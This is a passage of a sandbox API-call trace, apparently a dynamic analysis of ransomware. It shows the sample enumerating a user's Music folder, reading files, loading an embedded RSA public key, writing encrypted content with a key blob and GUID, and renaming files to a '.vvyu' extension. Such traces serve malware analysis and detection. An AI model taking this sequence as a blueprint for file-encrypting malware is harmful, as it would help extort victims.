lpMem=0x2ae6458 | out: hHeap=0x2c0000) returned 1 [0195.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63f8 | out: hHeap=0x2c0000) returned 1 [0195.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63c8 | out: hHeap=0x2c0000) returned 1 [0195.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0195.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0195.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0195.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63b0 | out: hHeap=0x2c0000) returned 1 [0195.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae22f0 | out: hHeap=0x2c0000) returned 1 [0195.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0195.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0195.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0195.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0195.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0195.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0195.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.168] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x1791f, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x1791f, lpOverlapped=0x0) returned 1 [0195.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0195.170] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17924, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.170] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0195.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0195.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0195.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0195.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.171] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.172] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.172] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.172] CloseHandle (hObject=0x584) returned 1 [0195.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0195.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0195.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0195.174] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\4g2bIkE6.wav" (normalized: "c:\\users\\keecfmwgj\\music\\5u0vvnc3nroc8n_z\\4g2bike6.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\4g2bIkE6.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\5u0vvnc3nroc8n_z\\4g2bike6.wav.vvyu")) returned 1 [0195.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.175] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0195.178] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaea55950, ftCreationTime.dwHighDateTime=0x1d8a415, ftLastAccessTime.dwLowDateTime=0x2e598de0, ftLastAccessTime.dwHighDateTime=0x1d8a6fc, ftLastWriteTime.dwLowDateTime=0x2e598de0, ftLastWriteTime.dwHighDateTime=0x1d8a6fc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k8_cI3l6hV1-Y7", cAlternateFileName="K8_CI3~1")) returned 1 [0195.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b860 [0195.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x2ae00c8 [0195.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0195.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0195.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31ba80 [0195.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0195.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40210 [0195.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0195.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0195.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b7d8 | out: hHeap=0x2c0000) returned 1 [0195.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0195.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0195.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0195.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0195.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b860 | out: hHeap=0x2c0000) returned 1 [0195.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.195] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x402974f0, ftCreationTime.dwHighDateTime=0x1d8a11a, ftLastAccessTime.dwLowDateTime=0x4903a3a0, ftLastAccessTime.dwHighDateTime=0x1d8a3ab, ftLastWriteTime.dwLowDateTime=0x4903a3a0, ftLastWriteTime.dwHighDateTime=0x1d8a3ab, nFileSizeHigh=0x0, nFileSizeLow=0x168a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uDCO8hlR7krD.m4a", cAlternateFileName="UDCO8H~1.M4A")) returned 1 [0195.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0195.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.195] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\uDCO8hlR7krD.m4a") returned=".m4a" [0195.195] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\uDCO8hlR7krD.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\5u0vvnc3nroc8n_z\\udco8hlr7krd.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0195.196] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=5770) returned 1 [0195.196] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0195.198] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1664, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.198] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.200] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.200] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x168a, lpOverlapped=0x0) returned 1 [0195.201] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0195.201] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.201] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.201] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0195.202] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0195.202] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.202] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0195.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0195.202] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0195.202] GetLastError () returned 0x0 [0195.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.202] GetLastError () returned 0x0 [0195.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.203] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0195.203] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0195.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.203] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0195.203] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0195.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.203] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0195.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1690) returned 0x2ae9ea0 [0195.203] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0195.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0195.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0195.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae22f0 [0195.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63b0 [0195.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae22a8 [0195.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63c8 [0195.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63f8 [0195.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6458 [0195.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6410 [0195.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0195.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0195.204] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0195.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0195.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63f8 | out: hHeap=0x2c0000) returned 1 [0195.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6410 | out: hHeap=0x2c0000) returned 1 [0195.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6458 | out: hHeap=0x2c0000) returned 1 [0195.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0195.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6458 [0195.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0195.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6410 [0195.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0195.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae63f8 [0195.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0195.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0195.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0195.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0195.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0195.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0195.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6410 | out: hHeap=0x2c0000) returned 1 [0195.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63f8 | out: hHeap=0x2c0000) returned 1 [0195.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6458 | out: hHeap=0x2c0000) returned 1 [0195.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0195.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0195.207] GetCurrentThreadId () returned 0x5d8 [0195.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0195.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae8148 [0195.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0195.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0195.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0195.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.208] GetCurrentThreadId () returned 0x5d8 [0195.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0195.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0195.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0195.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0195.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6458 [0195.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63f8 [0195.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0195.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0195.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6410 [0195.210] HeapFree (in: hHeap=0x2c0000, 